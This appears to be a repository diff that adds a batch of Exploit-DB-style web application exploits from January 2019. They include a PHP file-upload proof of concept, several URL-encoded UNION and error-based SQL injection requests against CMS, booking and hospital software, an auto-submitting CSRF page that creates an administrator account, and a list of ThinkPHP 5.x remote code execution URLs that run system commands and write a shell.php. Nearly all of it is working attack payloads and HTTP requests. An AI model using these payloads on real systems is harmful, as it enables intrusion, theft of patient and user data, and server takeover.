# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/server.php
#
#/[PATH]/server.php
#912 case "save_settings":{
#913 if($_FILES['call_widget_image']['name']!=''){
#914 $ext = getExtension($_FILES['call_widget_image']['name']);
#915 $fileName = uniqid().'.'.$ext;
#916 $tmpName = $_FILES['call_widget_image']['tmp_name'];
#917 $res = move_uploaded_file($tmpName,'images/'.$fileName);
#918 if($res){
#919 $fileName = $fileName;
#920 @unlink('images/'.$_REQUEST['hidden_call_widget_image']);
#921 }else{
#922 $fileName = $_REQUEST['hidden_call_widget_image'];
#923 }
#924 }else{
#925 $fileName = $_REQUEST['hidden_call_widget_image'];
#926 }
POST /[PATH]/server.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 592
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------307672102411665: undefined
Content-Disposition: form-data; name="call_widget_image"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------307672102411665
Content-Disposition: form-data; name="hidden_call_widget_image"
5c3b2a6842c13.png
-----------------------------307672102411665
Content-Disposition: form-data; name="settings_id"
1
-----------------------------307672102411665
Content-Disposition: form-data; name="cmd"
save_settings
-----------------------------307672102411665--
HTTP/1.1 302 Found
Date: Sun, 13 Jan 2019 12:14:24 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
location: settings.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/server.php
#
<html>
<body>
<form action="http://localhost/[PATH]/server.php" method="post" enctype="multipart/form-data">
<div class="form-group">
<label>Call Widget Image</label>
<input name="call_widget_image" type="file">
<input name="hidden_call_widget_image" value="5c3b2a6842c13.png" type="hidden">
</div>
<div class="form-group">
<input name="settings_id" value="1" type="hidden">
<input name="cmd" value="save_settings" type="hidden">
<input value="Save" class="btn btn-primary" type="submit">
<input value="Back" class="btn btn-default" onclick="history.go(-1)" type="button">
</div>
</form>
</body>
</html>
# POC:
# 3)
# http://localhost/[PATH]/add_widget.php?wid=[SQL]
#
#04 if($_REQUEST['wid']!=''){
#05 $widget = getWidget($_REQUEST['wid']);
#06 $pageTitle = 'Edit Widget';
#07 }else{
#08 $pageTitle = 'Create Widget';
#09 }
GET /[PATH]/add_widget.php?wid=%2d%34%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e()%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 12:34:12 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

40
exploits/php/webapps/46144.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Craigs CMS 1.0.2 - SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/craigs-cms-directory-listing-theme/22431565
# Version: 1.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/profile_detail.php?users=[SQL]
#
GET /[PATH]/profile_detail.php?users=-x%27%20UNION%20SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=3peclhdno4t80jmagl0gurf1o4
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.39
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Content-Encoding: br
Vary: Accept-Encoding
Date: Sun, 13 Jan 2019 15:39:40 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close

70
exploits/php/webapps/46145.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Locations CMS 1.5 - SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/detail.php?title=&id=[SQL]
#
GET /[PATH]/detail.php?title=&id=2%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=3peclhdno4t80jmagl0gurf1o4
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.39
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 255
Content-Encoding: br
Vary: Accept-Encoding
Date: Sun, 13 Jan 2019 15:59:33 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
# POC:
# 2)
# http://localhost/[PATH]/blog_detail.php?title=&id=[SQL]
#
GET /[PATH]/blog_detail.php?title=&id=1%27%20%50%72%6f%63%65%64%75%72%65%20%41%6e%61%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=3peclhdno4t80jmagl0gurf1o4
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.39
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 214
Content-Encoding: br
Vary: Accept-Encoding
Date: Sun, 13 Jan 2019 16:02:16 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close

162
exploits/php/webapps/46146.txt Normal file
View file

@ -0,0 +1,162 @@
# Exploit Title: Cleanto 5.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://skymoonlabs.com/
# Software Link: https://codecanyon.net/item/appointment-booking-software-for-cleaning-maintenance-businesses-cleanto/18397969
# Version: 5.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/assets/lib/front_ajax.php
#
%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d
POST /[PATH]/assets/lib/front_ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 572
Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1; __stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11; __stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
service_id=%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 13 Jan 2019 17:32:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Endurance-Cache-Level: 2
Transfer-Encoding: chunked
# POC:
# 2)
# http://localhost/[PATH]/assets/lib/front_ajax.php
#
%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d
POST /[PATH]/assets/lib/front_ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 584
Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1; __stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11; __stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
method_id=%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 13 Jan 2019 17:37:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Endurance-Cache-Level: 2
Transfer-Encoding: chunked
# POC:
# 3)
# http://localhost/[PATH]/assets/lib/front_ajax.php
#
POST /[PATH]/assets/lib/front_ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1; __stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11; __stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
addon_id=%2d%31%34%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d&qty_vals=2&s_addon_units_maxlimit_4_ratesss=1: undefined
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 13 Jan 2019 17:48:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Endurance-Cache-Level: 2
Transfer-Encoding: chunked
# POC:
# 4)
# http://localhost/[PATH]/assets/lib/export_ajax.php
#
POST /[PATH]/assets/lib/export_ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1; __stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11; __stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
id=5 UNION SELECT 1,2,3,4,(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 13 Jan 2019 18:14:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Cache-Control: max-age=7200
Expires: Sun, 13 Jan 2019 20:14:25 GMT
Vary: Accept-Encoding
X-Endurance-Cache-Level: 2
Transfer-Encoding: chunked
# POC:
# 5)
# http://localhost/[PATH]/assets/lib/service_method_ajax.php
#
POST /[PATH]/assets/lib/service_method_ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1; __stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11; __stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
service_id=%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%2c%35%2d%2d%20%2d&getallservicemethod=1: undefined
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 13 Jan 2019 18:21:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Cache-Control: max-age=7200
Expires: Sun, 13 Jan 2019 20:21:32 GMT
Vary: Accept-Encoding
X-Endurance-Cache-Level: 2
Transfer-Encoding: chunked

111
exploits/php/webapps/46148.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: HealthNode Hospital Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://sunriseservices.biz/
# Software Link: https://codecanyon.net/item/healthnode-hospital-management-system/22368747
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/email.php
#
POST /[PATH]/email.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27 /*!11111uniOn*/ /*!11111selEct*/ %31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d&submit=: undefined
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 18:50:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 61
Connection: close
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/dashboard/Patient/patientdetails.php?id=[SQL]
#
GET /[PATH]/dashboard/Patient/patientdetails.php?id=-11%2d%31%31%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 18:59:44 GMT
Server: Apache
Content-Length: 26036
Connection: close
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/dashboard/Patient/info.php?id=[SQL]
#
GET /[PATH]/dashboard/Patient/info.php?id=%2d%31%31%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 18:57:32 GMT
Server: Apache
Content-Length: 26405
Connection: close
Content-Type: text/html; charset=UTF-8
# POC:
# 4)
# http://localhost/[PATH]//
#
POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%2d%27%20%2f%2a%21%31%31%31%31%31%75%6e%69%4f%6e%2a%2f%20%2f%2a%21%31%31%31%31%31%73%65%4c%65%63%74%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%56%65%72&password=%27&login=: undefined
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 18:46:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 61
Connection: close
Content-Type: text/html; charset=UTF-8

48
exploits/php/webapps/46149.html Normal file
View file

@ -0,0 +1,48 @@
<!--
# Exploit Title: Hucart cms v5.7.4 CSRF vulnerability add administrator account
# Date: 2019-01-13
# Exploit Author: AllenChen520allen@gmail.com
# Vendor Homepage: http://www.hucart.com/
# Software Link: http://www.hucart.com/
# Version: v5.7.4
# CVE : CVE-2019-6249
An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add.Referenceshttp://www.iwantacve.cn/index.php/archives/109/
After the administrator logged in, open the csrf exp page.
-->
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='admin@hack.com' />";
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='adm_enabled' value='1' />";
fields += "<input type='hidden' name='act_type' value='add' />";
fields += "<input type='hidden' name='adm_id' value='' />";
var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

68
exploits/php/webapps/46150.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: thinkphp 5.X RCE
# Date: 2019-1-14
# Exploit Author: vr_system
# Vendor Homepage: http://www.thinkphp.cn/
# Software Link: http://www.thinkphp.cn/down.html
# Version: 5.x
# Tested on: windows 7/10
# CVE : None
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
1、https://blog.thinkphp.cn/869075
2、https://blog.thinkphp.cn/910675
POC
thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#
thinkphp 5.0.23完整版debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.0.23(完整版)
33、postpublic/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thhinkphp 5.0.10(完整版)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

94
exploits/php/webapps/46151.txt Normal file
View file

@ -0,0 +1,94 @@
# Exploit Title: Real Estate Custom Script 2.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ocsolutions.co.in/
# Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075
# Version: 2.0
# Category: Webapps
